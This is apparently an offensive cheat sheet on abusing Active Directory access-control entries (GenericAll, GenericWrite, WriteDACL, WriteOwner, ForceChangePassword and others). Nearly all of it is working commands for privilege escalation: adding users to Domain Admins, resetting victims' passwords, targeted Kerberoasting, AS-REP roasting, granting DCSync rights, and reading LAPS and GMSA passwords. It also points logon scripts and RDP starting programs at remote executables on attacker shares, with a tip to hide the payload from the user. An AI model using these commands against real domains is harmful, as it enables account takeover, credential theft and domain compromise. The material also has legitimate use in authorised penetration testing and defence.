# Active Directory - Access Controls ACL/ACE * ACL: Access Control Lists * ACE: Access Control Entry Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner). ```powershell ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtree -EffectiveRightsPrincipal User1 -Output HTML -Show ``` ## GenericAll * **GenericAll on User** : We can reset user's password without knowing the current password * **GenericAll on Group** : Effectively, this allows us to add ourselves (the user hacker) to the Domain Admin group : * On Windows : `net group "domain admins" hacker /add /domain` * On Linux: * using the Samba software suite : `net rpc group ADDMEM "GROUP NAME" UserToAdd -U 'hacker%MyPassword123' -W DOMAIN -I [DC IP]` * using bloodyAD: `bloodyAD.py --host [DC IP] -d DOMAIN -u hacker -p MyPassword123 addObjectToGroup UserToAdd 'GROUP NAME'` * **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a Service Ticket (ST), then grab its hash and kerberoast it. ```powershell # Check for interesting permissions on accounts: Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"} # Check if current user has already an SPN setted: PowerView2 > Get-DomainUser -Identity | select serviceprincipalname # Force set the SPN on the account: Targeted Kerberoasting PowerView2 > Set-DomainObject -Set @{serviceprincipalname='ops/whatever1'} PowerView3 > Set-DomainObject -Identity -Set @{serviceprincipalname='any/thing'} # Grab the ticket PowerView2 > $User = Get-DomainUser username PowerView2 > $User | Get-DomainSPNTicket | fl PowerView2 > $User | Select serviceprincipalname # Remove the SPN PowerView2 > Set-DomainObject -Identity username -Clear serviceprincipalname ``` * **GenericAll/GenericWrite** : We can change a victim's **userAccountControl** to not require Kerberos preauthentication, grab the user's crackable AS-REP, and then change the setting back. * On Windows: ```powershell # Modify the userAccountControl PowerView2 > Get-DomainUser username | ConvertFrom-UACValue PowerView2 > Set-DomainObject -Identity username -XOR @{useraccountcontrol=4194304} -Verbose # Grab the ticket PowerView2 > Get-DomainUser username | ConvertFrom-UACValue ASREPRoast > Get-ASREPHash -Domain domain.local -UserName username # Set back the userAccountControl PowerView2 > Set-DomainObject -Identity username -XOR @{useraccountcontrol=4194304} -Verbose PowerView2 > Get-DomainUser username | ConvertFrom-UACValue ``` * On Linux: ```bash # Modify the userAccountControl $ bloodyAD.py --host [DC IP] -d [DOMAIN] -u [AttackerUser] -p [MyPassword] setUserAccountControl [Target_User] 0x400000 True # Grab the ticket $ GetNPUsers.py DOMAIN/target_user -format -outputfile # Set back the userAccountControl $ bloodyAD.py --host [DC IP] -d [DOMAIN] -u [AttackerUser] -p [MyPassword] setUserAccountControl [Target_User] 0x400000 False ``` ## GenericWrite * Reset another user's password * On Windows: ```powershell # https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1 $user = 'DOMAIN\user1'; $pass= ConvertTo-SecureString 'user1pwd' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential $user, $pass; $newpass = ConvertTo-SecureString 'newsecretpass' -AsPlainText -Force; Set-DomainUserPassword -Identity 'DOMAIN\user2' -AccountPassword $newpass -Credential $creds; ``` * On Linux: ```bash # Using rpcclient from the Samba software suite rpcclient -U 'attacker_user%my_password' -W DOMAIN -c "setuserinfo2 target_user 23 target_newpwd" # Using bloodyAD with pass-the-hash bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B changePassword target_user target_newpwd ``` * WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1` ### GenericWrite and Remote Connection Manager > Now let’s say you are in an Active Directory environment that still actively uses a Windows Server version that has RCM enabled, or that you are able to enable RCM on a compromised RDSH, what can we actually do ? Well each user object in Active Directory has a tab called ‘Environment’. > > This tab includes settings that, among other things, can be used to change what program is started when a user connects over the Remote Desktop Protocol (RDP) to a TS/RDSH in place of the normal graphical environment. The settings in the ‘Starting program’ field basically function like a windows shortcut, allowing you to supply either a local or remote (UNC) path to an executable which is to be started upon connecting to the remote host. During the logon process these values will be queried by the RCM process and run whatever executable is defined. - https://sensepost.com/blog/2020/ace-to-rce/ :warning: The RCM is only active on Terminal Servers/Remote Desktop Session Hosts. The RCM has also been disabled on recent version of Windows (>2016), it requires a registry change to re-enable. ```powershell $UserObject = ([ADSI]("LDAP://CN=User,OU=Users,DC=ad,DC=domain,DC=tld")) $UserObject.TerminalServicesInitialProgram = "\\1.2.3.4\share\file.exe" $UserObject.TerminalServicesWorkDirectory = "C:\" $UserObject.SetInfo() ``` NOTE: To not alert the user the payload should hide its own process window and spawn the normal graphical environment. ## WriteDACL To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privileges. It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'user1' -Domain 'domain.local' -Password 'Welcome01!'` * WriteDACL on Domain: * On Windows: ```powershell # Give DCSync right to the principal identity Import-Module .\PowerView.ps1 $SecPassword = ConvertTo-SecureString 'user1pwd' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('DOMAIN.LOCAL\user1', $SecPassword) Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'DC=domain,DC=local' -Rights DCSync -PrincipalIdentity user2 -Verbose -Domain domain.local ``` * On Linux: ```bash # Give DCSync right to the principal identity bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2 # Remove right after DCSync bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2 False ``` * WriteDACL on Group ```powershell PowerSploit> Add-DomainObjectAcl -TargetIdentity "INTERESTING_GROUP" -Rights WriteMembers -PrincipalIdentity User1 net group "INTERESTING_GROUP" User1 /add /domain bloodyAD> bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp # Remove right bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp False ``` ## WriteOwner An attacker can update the owner of the target object. Once the object owner has been changed to a principal the attacker controls, the attacker may manipulate the object any way they see fit. This can be achieved with Set-DomainObjectOwner (PowerView module). ```powershell Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal' ``` Using BloodyAD ```powershell bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setOwner devil_user1 target_object ``` This ACE can be abused for an Immediate Scheduled Task attack, or for adding a user to the local admin group. ## ReadLAPSPassword An attacker can read the LAPS password of the computer account this ACE applies to. This can be achieved with the Active Directory PowerShell module. Detail of the exploitation can be found in the [Reading LAPS Password](#reading-laps-password) section. ```powershell Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime' ``` Or for a given computer ```powershell bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes LAPS_PC$ ms-mcs-admpwd,ms-mcs-admpwdexpirationtime ``` ## ReadGMSAPassword An attacker can read the GMSA password of the account this ACE applies to. This can be achieved with the Active Directory and DSInternals PowerShell modules. ```powershell # Save the blob to a variable $gmsa = Get-ADServiceAccount -Identity 'SQL_HQ_Primary' -Properties 'msDS-ManagedPassword' $mp = $gmsa.'msDS-ManagedPassword' # Decode the data structure using the DSInternals module ConvertFrom-ADManagedPasswordBlob $mp ``` Using BloodyAD ```powershell python bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes gmsaAccount$ msDS-ManagedPassword ``` ## ForceChangePassword An attacker can change the password of the user this ACE applies to: * Windows: ```powershell $NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force Set-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPassword ``` * Linux: ```bash # Using rpcclient from the Samba software suite rpcclient -U 'attacker_user%my_password' -W DOMAIN -c "setuserinfo2 target_user 23 target_newpwd" # Using bloodyAD with pass-the-hash bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B changePassword target_user target_newpwd ``` ## References * [ACE to RCE - @JustinPerdok - July 24, 2020](https://sensepost.com/blog/2020/ace-to-rce/) * [Access Control Entries (ACEs) - The Hacker Recipes - @_nwodtuhs](https://www.thehacker.recipes/active-directory-domain-services/movement/abusing-aces) * [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)